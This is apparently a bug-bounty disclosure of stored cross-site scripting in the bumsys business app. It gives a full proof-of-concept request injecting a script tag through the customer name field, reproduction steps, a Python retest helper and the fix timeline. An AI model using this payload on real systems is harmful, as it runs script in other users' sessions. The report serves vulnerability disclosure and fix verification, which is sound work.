Multiple XSS on update functions with module select options and search form in unilogies/bumsys

Valid

Reported on Mar 29th 2023


Description

Stored XSS. Values entered through update forms (for example a customer name) are saved without sanitisation and later rendered unencoded by the AJAX loaders that populate module select options and search forms, so a script tag in the stored value executes when another user opens a page that loads it.

Proof of Concept

POST /bumsys/xhr/?module=peoples&page=updateCustomer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------308170463032889995491505595073
Content-Length: 2215
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/peoples/customer-list/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerName"

test2"><script>alert('edit')</script>
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerNameLocalLen"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerType"

Distributor
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPhone"

123
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerEmail"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerOpeningBalance"

11.00
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerShippingRate"

0.0000
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDiscount"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerSendNotification"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDivision"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDistrict"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerUpazila"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPostalCode"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerCountry"

Bangladesh
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerWebsite"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerAddress"

  
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customer_id"

3
-----------------------------308170463032889995491505595073--

AJAX loader (the response that renders the stored customer name unencoded):

GET /bumsys/xhr/?module=my-shop&page=editDiscount&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/bumsys/my-shop/discounts/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Step 1. Create a new customer without the payload, then view the customer list.
Step 2. Add a discount under My Shop.
Step 3. Edit the customer name with the payload above (the updateCustomer request), then view the customer list again.
Step 4. Edit the discount (the editDiscount loader above) and observe the alert.

Check every AJAX module function that outputs stored values, in particular where html_entity_decode is applied to the value before it is written into HTML.
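The following is an added example, not part of the huntr report or of the bumsys code base. It rebuilds the multipart body of the updateCustomer request above offline, and checks an AJAX loader fragment for a live (unencoded) copy of the stored payload so the same check can be rerun after a fix. The "decode, then concatenate into markup" rendering is an assumed model of the html_entity_decode hint in the report, written here with Python's html.unescape and html.escape standing in for PHP's html_entity_decode and htmlspecialchars; the function names are the example's own.

```python
# Added example (not bumsys code). Rebuilds the PoC POST body offline and
# checks whether a stored customer name comes back unencoded from a loader.
import html
import re
from typing import Dict

# Payload and boundary copied from the PoC request in the report.
PAYLOAD = 'test2"><script>alert(\'edit\')</script>'
BOUNDARY = "---------------------------308170463032889995491505595073"

# Field set copied from the PoC; only customerName carries the payload.
UPDATE_CUSTOMER_FIELDS: Dict[str, str] = {
    "customerName": PAYLOAD,
    "customerNameLocalLen": "",
    "customerType": "Distributor",
    "customerPhone": "123",
    "customerEmail": "",
    "customerOpeningBalance": "11.00",
    "customerShippingRate": "0.0000",
    "customerDiscount": "0",
    "customerSendNotification": "0",
    "customerDivision": "",
    "customerDistrict": "",
    "customerUpazila": "",
    "customerPostalCode": "",
    "customerCountry": "Bangladesh",
    "customerWebsite": "",
    "customerAddress": "",
    "customer_id": "3",
}


def build_multipart_body(fields: Dict[str, str], boundary: str = BOUNDARY) -> bytes:
    """Serialise form fields the way the browser did in the PoC (CRLF line ends)."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f"{value}\r\n"
        )
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode("utf-8")


def store_customer_name(raw: str) -> str:
    """Assumed write path: the value is entity-encoded before it is saved."""
    return html.escape(raw, quote=True)


def render_option_vulnerable(stored: str, option_id: int = 3) -> str:
    """Assumed vulnerable loader: decodes the stored value (html_entity_decode,
    modelled by html.unescape) and concatenates it straight into the markup."""
    return f'<option value="{option_id}">{html.unescape(stored)}</option>'


def render_option_fixed(stored: str, option_id: int = 3) -> str:
    """Hardened loader: decode to the canonical value, then encode it for the
    HTML context it is inserted into, so a stored payload stays inert text."""
    name = html.escape(html.unescape(stored), quote=True)
    return f'<option value="{option_id}">{name}</option>'


_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def payload_is_live(response_html: str) -> bool:
    """True if a script tag survives unencoded in the AJAX fragment; an encoded
    copy (&lt;script&gt;) does not match and cannot execute."""
    return _SCRIPT_TAG.search(response_html) is not None


if __name__ == "__main__":
    body = build_multipart_body(UPDATE_CUSTOMER_FIELDS)
    print(f"POST body: {len(body)} bytes")
    stored = store_customer_name(PAYLOAD)
    for label, fragment in (
        ("vulnerable", render_option_vulnerable(stored)),
        ("fixed", render_option_fixed(stored)),
    ):
        print(f"{label:10} live={payload_is_live(fragment)}  {fragment}")
```

To retest a patched instance, send `build_multipart_body(UPDATE_CUSTOMER_FIELDS)` to the updateCustomer endpoint with the same Content-Type boundary and a valid X-CSRF-TOKEN, then run `payload_is_live` over the body of the editDiscount loader response: the fix is complete only when it returns False for every loader that echoes the name.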

Impact

In general, stored XSS occurs when an attacker injects malicious content (the payload) as user input and it is stored on the target server, for example in a message forum, comment field, visitor log or database.

When the victim opens the web page in a browser, the malicious data is served to the victim's browser like any other legitimate data, and the script executes in the victim's session as soon as the page is viewed. Here the payload is stored in the customer name and runs for any user who opens the discount edit form, or any other page whose AJAX loader echoes that name.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
TuanTH modified the report (five revisions) a year ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back a year ago
Khurshid Alam validated this vulnerability a year ago
tht1997 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
TuanTH (Researcher), a year ago:

Can you assign a CVE for this vulnerability, please? It would be very nice.

Khurshid Alam, 10 months ago:

Thank you. We are working with some functionality. We will update soon. Thanks.

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f 10 months ago
Khurshid Alam has been awarded the fix bounty
This vulnerability has now been published 10 months ago
ajax.php#L543-L610 has been validated
ajax.php#L1209-L1253 has been validated
ajax_select2.php#L677-L706 has been validated
ajax.php#L78-L178 has been validated
ajax.php#L2158-L2208 has been validated
Khurshid Alam, 10 months ago:

@admin, please assign a CVE.

Pavlos (Admin), 10 months ago:

ok :)